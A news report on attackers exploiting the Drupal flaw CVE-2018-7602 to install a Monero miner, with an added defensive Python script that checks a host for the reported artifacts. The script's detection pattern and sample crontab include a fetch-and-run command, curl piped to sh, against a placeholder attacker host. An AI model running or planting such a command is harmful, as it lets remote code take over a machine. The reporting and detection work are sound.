Hackers are trying to exploit a recently patched Drupal flaw (CVE-2018-7602) to turn affected systems into Monero-mining bots.
CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability affecting Drupal versions 7 and 8. Drupal released a patch for the flaw on April 25, 2018.
Security researchers at Trend Micro “were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.”
Successful exploitation of the flaw lets attackers modify or delete the content of a Drupal-run site.
The attackers are using the vulnerability to download a shell script that retrieves an Executable and Linkable Format (ELF) downloader. The downloader then adds a crontab entry to update itself automatically.
The cron command checks the link from which it downloads, and then interprets, a script named up.jpg that poses as a JPEG file.
The ELF-based downloader then also downloads the open-source XMRig (version 2.6.3) Monero miner and installs it on the device.
Once installed, the miner changes its process name to [^$I$^] and accesses the file /tmp/dvir.pid. The malware uses the HTTP 1.0 POST method in its SEND_DATA() function to send data back to the attackers.
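A host-level triage check for the artifacts described above (an added example, not code from the article or from Trend Micro): it looks for the renamed miner process, the pid file and a self-updating crontab entry in constructed sample data. The process table, crontab lines and file set are assumed to be supplied by the caller, and the URL host in the sample is a placeholder.

```python
# Added example: offline triage for the three host artifacts the article names.
# Assumption: the caller supplies the process table, crontab lines and file set.
import re

# Artifacts named in the article.
MINER_PROCESS_NAME = "[^$I$^]"    # name the XMRig process renames itself to
MINER_PID_FILE = "/tmp/dvir.pid"   # file the miner accesses
CRON_SCRIPT_NAME = "up.jpg"        # script fetched as a fake JPEG by the cron job

# Crontab entries that fetch a remote file and pipe it into a shell, or that
# reference the fake-JPEG script, match how the ELF downloader updates itself.
_CRON_PATTERN = re.compile(
    r"(curl|wget)\b.*(\|\s*(sh|bash)\b|" + re.escape(CRON_SCRIPT_NAME) + r")"
)

def find_miner_processes(process_table):
    """Return (pid, name) pairs whose name is the miner's disguise."""
    return [(pid, name) for pid, name in process_table if name == MINER_PROCESS_NAME]

def find_suspicious_cron(cron_lines):
    """Return crontab lines matching the downloader's self-update pattern."""
    return [line for line in cron_lines if _CRON_PATTERN.search(line)]

def triage(process_table, cron_lines, existing_files):
    """Collect findings; an empty list means none of the artifacts were seen."""
    findings = []
    for pid, name in find_miner_processes(process_table):
        findings.append(f"process {pid} uses miner name {name!r}")
    for line in find_suspicious_cron(cron_lines):
        findings.append(f"crontab self-update entry: {line}")
    if MINER_PID_FILE in existing_files:
        findings.append(f"miner pid file present: {MINER_PID_FILE}")
    return findings

# Constructed sample data; the URL host is a placeholder, not a real indicator.
SAMPLE_PROCESSES = [(1, "systemd"), (812, "sshd"), (4242, "[^$I$^]"), (4300, "php-fpm")]
SAMPLE_CRON = [
    "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf",
    "*/10 * * * * curl -s http://ATTACKER-HOST.invalid/up.jpg | sh",
]
SAMPLE_FILES = {"/tmp/dvir.pid", "/var/run/sshd.pid"}

if __name__ == "__main__":
    for finding in triage(SAMPLE_PROCESSES, SAMPLE_CRON, SAMPLE_FILES):
        print("FINDING:", finding)
```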
“The attacks are notable for the precautions they took in that they hide behind the Tor network. We were able to follow the malware’s trail to 197[.]231[.]221[.]211. Based on WhoIs information, the IP segment 197[.]231[.]221[.]0[/]24 appears to belong to a virtual private network (VPN) provider. Additionally, we found that the IP address is a Tor exit node — gateways from where encrypted Tor traffic is passed to normal internet traffic.”
According to Trend Micro researchers, they have blocked 810 attacks from this IP address in the past month, but they do not have enough evidence to confirm whether all of those attacks are related to the Monero-mining payload.